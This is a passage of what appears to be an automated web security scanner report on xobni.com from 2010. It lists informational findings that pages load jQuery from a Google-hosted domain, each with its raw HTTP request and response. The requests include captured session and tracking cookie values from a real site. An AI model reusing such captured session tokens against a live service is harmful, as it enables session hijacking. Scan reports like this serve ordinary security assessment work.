Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:03:31 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7928

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.64. http://www.xobni.com/hoovers-outlook previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/hoovers-outlook

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /hoovers-outlook HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/huddle-outlook
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:17:51 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13088

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Hoovers in Outloo
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.65. http://www.xobni.com/huddle-outlook previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/huddle-outlook

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /huddle-outlook HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:33 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13851

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Huddle in Outlook
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.66. http://www.xobni.com/learnmore/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/learnmore/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /learnmore/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:10 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 14446

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>L'Outlook add-in
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.67. http://www.xobni.com/learnmore/compare.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/learnmore/compare.php

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /learnmore/compare.php HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/learnmore/plus/
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:26 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 10657

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Free vs. Xo
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.68. http://www.xobni.com/learnmore/extension_step1.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/learnmore/extension_step1.php

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /learnmore/extension_step1.php HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/salesforce
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:32 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8711

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni - Using You
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.69. http://www.xobni.com/learnmore/mobile previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/learnmore/mobile

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /learnmore/mobile HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:11 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15898

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni f..r BlackB
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.70. http://www.xobni.com/learnmore/mobile/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/learnmore/mobile/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /learnmore/mobile/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:10 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15798

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni for BlackBe
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.71. http://www.xobni.com/learnmore/mobile/blackberry/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/learnmore/mobile/blackberry/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /learnmore/mobile/blackberry/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:05 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15934

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni f..r BlackB
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.72. http://www.xobni.com/learnmore/mobile/blackberry/get_started previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/learnmore/mobile/blackberry/get_started

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /learnmore/mobile/blackberry/get_started HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/learnmore/mobile/
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:17 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 11983

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni f..r BlackB
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.73. http://www.xobni.com/learnmore/mobile/blackberry/get_started.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/learnmore/mobile/blackberry/get_started.php

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /learnmore/mobile/blackberry/get_started.php HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/learnmore/mobile/
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:11 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 11995

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni f..r BlackB
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.74. http://www.xobni.com/learnmore/mobile/blackberry/magic_address_book previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/learnmore/mobile/blackberry/magic_address_book

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /learnmore/mobile/blackberry/magic_address_book HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/learnmore/mobile/
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:12 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 10779

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni for BlackBe
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.75. http://www.xobni.com/learnmore/mobile/blackberry/setup_instructions previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/learnmore/mobile/blackberry/setup_instructions

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /learnmore/mobile/blackberry/setup_instructions HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/learnmore/mobile/
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:16 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 10749

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni f..r BlackB
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.76. http://www.xobni.com/learnmore/mobile/blackberry/setup_instructions.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/learnmore/mobile/blackberry/setup_instructions.php

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /learnmore/mobile/blackberry/setup_instructions.php HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:11 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 10761

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni f..r BlackB
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.77. http://www.xobni.com/learnmore/mobile/buynow previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/learnmore/mobile/buynow

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

Response

12.78. http://www.xobni.com/learnmore/mobile/trial previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/learnmore/mobile/trial

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

Response

12.79. http://www.xobni.com/learnmore/one/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/learnmore/one/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /learnmore/one/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:11 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 9454

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni One - Verbi
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.80. http://www.xobni.com/learnmore/plus/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/learnmore/plus/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /learnmore/plus/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:10 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 14976

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Plus - Rech
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.81. http://www.xobni.com/learnmore/plus/advanced_search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/learnmore/plus/advanced_search.php

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /learnmore/plus/advanced_search.php HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/learnmore/plus/
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:01 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 12535

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Advanced Search f
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.82. http://www.xobni.com/learnmore/video previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/learnmore/video

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /learnmore/video HTTP/1.1
Host: www.xobni.com
Proxy-Connection: keep-alive
Referer: http://www.xobni.com/enterprise
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
